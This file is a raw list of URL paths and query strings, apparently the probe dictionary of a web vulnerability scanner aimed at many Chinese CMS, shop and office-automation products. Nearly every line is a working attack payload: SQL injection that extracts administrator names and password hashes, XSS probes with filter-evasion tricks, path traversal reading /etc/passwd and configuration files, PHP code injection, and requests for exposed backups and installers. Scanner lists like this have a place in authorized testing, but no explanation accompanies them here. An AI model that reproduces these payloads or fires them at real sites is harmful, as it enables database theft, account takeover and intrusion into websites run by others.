/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
